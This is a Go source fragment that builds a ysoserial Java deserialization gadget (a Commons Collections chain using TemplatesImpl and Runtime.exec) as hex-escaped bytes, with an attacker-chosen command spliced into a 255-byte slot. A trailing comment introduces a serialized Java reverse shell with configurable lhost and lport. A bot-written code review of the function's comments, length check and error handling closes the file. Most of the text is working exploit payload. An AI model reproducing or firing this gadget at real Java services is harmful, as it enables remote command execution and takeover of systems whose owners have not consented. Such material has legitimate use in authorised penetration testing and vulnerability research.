"\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73" + + "\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f" + + "\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70" + + "\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74" + + "\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c" + + "\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69" + + "\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65" + + "\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d" + + "\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73" + + "\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68" + + "\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65" + + "\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44" + + "\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65" + + "\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73" + + "\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68" + + "\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e" + + "\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65" + + "\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74" + + "\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01" + + "\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73" + + "\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f" + + "\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63" + + "\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74" + + "\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f" + + "\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e" + + "\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f" + + "\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c" + + "\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73" + + "\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f" + + "\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70" + + "\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74" + + "\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c" + + "\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69" + + "\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65" + + "\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61" + + "\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73" + + 
"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68" + + "\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e" + + "\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78" + + "\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01" + + "\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41" + + "\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67" + + "\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f" + + "\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72" + + "\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69" + + "\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e" + + "\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72" + + "\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64" + + "\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a" + + "\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73" + + "\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61" + + "\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67" + + "\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e" + + "\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01" + + "\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72" + + "\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c" + + "\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f" + + "\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d" + + "\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72" + + "\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76" + + "\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69" + + "\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f" + + "\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63" + + "\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74" + + "\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f" + + "\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65" + + "\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73" + + "\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61" + + "\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67" + + "\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69" + + "\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61" + + "\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00" + + 
"\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69" + + "\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" + + "\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d" + + "\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e" + + + // 255 characters were allocated, we just put back the unused + // length as spaces + "\x01\x00\xff" + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) + + + "\x08\x00\x30\x01\x00\x04" + + "\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76" + + "\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e" + + "\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e" + + "\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00" + + "\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x0d\x53" + + "\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65" + + "\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c" + + "\x2f\x50\x77\x6e\x65\x72\x37\x34\x30\x30\x32\x30" + + "\x33\x39\x32\x34\x35\x37\x39\x31\x01\x00\x1f\x4c" + + "\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77" + + "\x6e\x65\x72\x37\x34\x30\x30\x32\x30\x33\x39\x32" + + "\x34\x35\x37\x39\x31\x3b\x00\x21\x00\x02\x00\x03" + + "\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06" + + "\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04" + + "\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00" + + "\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7" + + "\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00" + + "\x06\x00\x01\x00\x00\x00\x2f\x00\x0e\x00\x00\x00" + + "\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00" + + "\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00" + + "\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1" + + "\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01" + + "\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03" + + "\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00" + + "\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01" + + "\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04" + + "\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02" + + "\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00" + + 
"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00" + + "\x06\x00\x01\x00\x00\x00\x36\x00\x0e\x00\x00\x00" + + "\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00" + + "\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00" + + "\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00" + + "\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00" + + "\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00" + + "\x01\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00" + + "\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12" + + "\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x01\x00\x36" + + "\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00" + + "\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00" + + "\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00" + + "\x7e\x00\x0e\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00" + + "\x00\x00\x32\x00\x1b\x0a\x00\x03\x00\x15\x07\x00" + + "\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65" + + "\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55" + + "\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e" + + "\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71" + + "\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69" + + "\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00" + + "\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65" + + "\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01" + + "\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61" + + "\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74" + + "\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c" + + "\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73" + + "\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61" + + "\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75" + + "\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24" + + "\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63" + + "\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67" + + "\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00" + + "\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65" + + "\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64" + + "\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65" + + 
"\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76" + + "\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" + + "\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f" + + "\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65" + + "\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c" + + "\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74" + + "\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21" + + "\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a" + + "\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02" + + "\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01" + + "\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00" + + "\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00" + + "\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3a\x00" + + "\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00" + + "\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00" + + "\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00" + + "\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50" + + "\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x72\x00\x2a" + + "\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63" + + "\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65" + + "\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c" + + "\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79" + + "\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74" + + "\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61" + + "\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e" + + "\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e" + + "\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65" + + "\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e" + + "\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f" + + "\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f" + + "\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e" + + "\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73" + + "\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c" + + "\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67" + + "\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c" + + "\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c" + + 
"\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d" + + "\x65\x71\x00\x7e\x00\x09\x5b\x00\x0b\x69\x50\x61" + + "\x72\x61\x6d\x54\x79\x70\x65\x73\x71\x00\x7e\x00" + + "\x08\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76" + + "\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63" + + "\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00" + + "\x00\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65" + + "\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72" + + "\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c" + + "\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16" + + "\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00" + + "\x00\x00\x00\x73\x72\x00\x11\x6a\x61\x76\x61\x2e" + + "\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70" + + "\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46" + + "\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72" + + "\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64" + + "\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08" + + "\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78" + + return []byte(payloadBytes), nil +} + // This is a serialized java reverse shell. The gadget was generated by ysoserial // but using the code in this pull https://github.com/frohoff/ysoserial/pull/96 // and updated to make it easy to swap in the desired lhost+lport of our choosing
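Review bot: The doc comment on `Commons11CommandBytecode` is a truncated fragment — only `// the allocated space (255).` survived the move from javaclass.go, so the exported function has no comment starting with its name and the origin of the 255 limit is explained nowhere. I would restore a full comment along the lines of `// Commons11CommandBytecode returns the ysoserial-generated gadget with commandStr spliced into a 255-byte constant-pool slot, the unused remainder padded with spaces; commandStr is therefore limited to 1-255 bytes.` and confirm whether the chain is CommonsCollections10 (the commit title) or 11 (the function name) before writing it down. Note that `len(commandStr)`, the padding arithmetic and the `\x01\x00\xff` length prefix are all byte counts, so the message `"command must be between 1 and 255 characters"` should say bytes, and non-ASCII input is not rejected even though the CONSTANT_Utf8 entry the bytes land in uses modified UTF-8 (a NUL byte, for example, is encoded differently there) — presumably callers only pass ASCII, but an explicit check or a comment would pin that down. On the error path `return []byte{}, ...` is conventionally `return nil, ...`. Since `errInvalidCommandLength` is unexported, callers cannot use `errors.Is` against it; exporting it as `ErrInvalidCommandLength` would also make the exported `ErrorInvalidCommandLength` wrapper unnecessary.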